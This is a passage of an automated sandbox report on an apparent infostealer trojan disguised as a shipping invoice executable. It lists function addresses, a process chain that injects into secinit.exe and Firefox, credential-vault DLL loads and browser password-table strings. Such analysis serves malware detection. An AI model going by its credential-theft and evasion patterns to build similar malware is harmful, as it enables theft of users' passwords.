                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EDAC63_2_016EDAC6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DDAAC3_2_016DDAAC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01685AA03_2_01685AA0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E1AA33_2_016E1AA3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F7D733_2_016F7D73
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01643D403_2_01643D40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F1D5A3_2_016F1D5A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165FDC03_2_0165FDC0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B9C323_2_016B9C32
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFCF23_2_016FFCF2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFF093_2_016FFF09
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01603FD23_2_01603FD2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01603FD53_2_01603FD5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FFFB13_2_016FFFB1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01641F923_2_01641F92
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01649EB03_2_01649EB0
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB248D5_2_04FB248D
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB24435_2_04FB2443
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB24445_2_04FB2444
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FD2F245_2_04FD2F24
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB40E45_2_04FB40E4
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB40DB5_2_04FB40DB
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBC8945_2_04FBC894
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB22F45_2_04FB22F4
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBAA945_2_04FBAA94
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FBAA8F5_2_04FBAA8F
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeCode function: 5_2_04FB43045_2_04FB4304
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330A3526_2_0330A352
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325E3F06_2_0325E3F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033103E66_2_033103E6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F02746_2_032F0274
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032D02C06_2_032D02C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032401006_2_03240100
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032EA1186_2_032EA118
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032D81586_2_032D8158
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033041A26_2_033041A2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033101AA6_2_033101AA
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033081CC6_2_033081CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032E20006_2_032E2000
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032507706_2_03250770
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032747506_2_03274750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0324C7C06_2_0324C7C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326C6E06_2_0326C6E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032505356_2_03250535
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033105916_2_03310591
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F44206_2_032F4420
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033024466_2_03302446
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032FE4F66_2_032FE4F6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330AB406_2_0330AB40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03306BD76_2_03306BD7
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0324EA806_2_0324EA80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032669626_2_03266962
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032529A06_2_032529A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0331A9A66_2_0331A9A6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032528406_2_03252840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325A8406_2_0325A840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032368B86_2_032368B8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0327E8F06_2_0327E8F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03292F286_2_03292F28
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03270F306_2_03270F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F2F306_2_032F2F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C4F406_2_032C4F40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032CEFA06_2_032CEFA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325CFE06_2_0325CFE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03242FC86_2_03242FC8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330EE266_2_0330EE26
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03250E596_2_03250E59
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330CE936_2_0330CE93
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03262E906_2_03262E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330EEDB6_2_0330EEDB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325AD006_2_0325AD00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032ECD1F6_2_032ECD1F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03268DBF6_2_03268DBF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0324ADE06_2_0324ADE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03250C006_2_03250C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F0CB56_2_032F0CB5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03240CF26_2_03240CF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330132D6_2_0330132D
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0323D34C6_2_0323D34C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0329739A6_2_0329739A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032552A06_2_032552A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F12ED6_2_032F12ED
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326B2C06_2_0326B2C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0328516C6_2_0328516C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0323F1726_2_0323F172
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0331B16B6_2_0331B16B
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0325B1B06_2_0325B1B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330F0E06_2_0330F0E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033070E96_2_033070E9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032FF0CC6_2_032FF0CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032570C06_2_032570C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330F7B06_2_0330F7B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032956306_2_03295630
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033016CC6_2_033016CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033075716_2_03307571
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032ED5B06_2_032ED5B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_033195C36_2_033195C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330F43F6_2_0330F43F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032414606_2_03241460
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FB766_2_0330FB76
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326FB806_2_0326FB80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0328DBF96_2_0328DBF9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C5BF06_2_032C5BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C3A6C6_2_032C3A6C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03307A466_2_03307A46
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FA496_2_0330FA49
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032EDAAC6_2_032EDAAC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03295AA06_2_03295AA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032F1AA36_2_032F1AA3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032FDAC66_2_032FDAC6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032E59106_2_032E5910
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032599506_2_03259950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326B9506_2_0326B950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032BD8006_2_032BD800
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032538E06_2_032538E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FF096_2_0330FF09
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FFB16_2_0330FFB1
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03251F926_2_03251F92
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03213FD26_2_03213FD2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03213FD56_2_03213FD5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03259EB06_2_03259EB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03307D736_2_03307D73
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03253D406_2_03253D40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_03301D5A6_2_03301D5A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0326FDC06_2_0326FDC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_032C9C326_2_032C9C32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0330FCF26_2_0330FCF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD1E906_2_02AD1E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACAF606_2_02ACAF60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACCF706_2_02ACCF70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACCD476_2_02ACCD47
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACCD506_2_02ACCD50
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACB0AF6_2_02ACB0AF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACB0B06_2_02ACB0B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ACB0F96_2_02ACB0F9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD36FB6_2_02AD36FB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD37006_2_02AD3700
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AD55006_2_02AD5500
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02AEBB906_2_02AEBB90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356E2C36_2_0356E2C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356E1A46_2_0356E1A4
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356D7286_2_0356D728
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_0356E65C6_2_0356E65C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: String function: 0162B970 appears 280 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: String function: 016AEA12 appears 86 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: String function: 01687E54 appears 111 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: String function: 016BF290 appears 105 times
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: String function: 01675130 appears 58 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 03297E54 appears 111 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 032CF290 appears 105 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0323B970 appears 280 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 03285130 appears 58 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 032BEA12 appears 86 times
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1420525696.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1422967015.0000000006E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000000.1388796538.0000000000730000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameztaV.exe@ vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1423761452.00000000079F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000000.00000002.1418547740.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.000000000172D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesecinitj% vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exeBinary or memory string: OriginalFilenameztaV.exe@ vs INVOICE, PACKING LIST, COPY BL.exe
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, Y89yuXlRbWJQaoDrKK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, YudlFeIlxJFsmZRCjZ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, YudlFeIlxJFsmZRCjZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, YudlFeIlxJFsmZRCjZ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.79f0000.4.raw.unpack, YudlFeIlxJFsmZRCjZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.INVOICE, PACKING LIST, COPY BL.exe.46dc698.2.raw.unpack, Y89yuXlRbWJQaoDrKK.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE, PACKING LIST, COPY BL.exe.logJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\secinit.exeFile created: C:\Users\user\AppData\Local\Temp\472E1186Jump to behavior
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1946377767.0000000002D33000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2641601175.0000000002D25000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1944117122.0000000002D04000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1944294597.0000000002D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: INVOICE, PACKING LIST, COPY BL.exeReversingLabs: Detection: 47%
                Source: INVOICE, PACKING LIST, COPY BL.exeVirustotal: Detection: 32%
                Source: unknownProcess created: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe"
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess created: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe"
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess created: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe"Jump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeSection loaded: wininet.dllJump to behavior
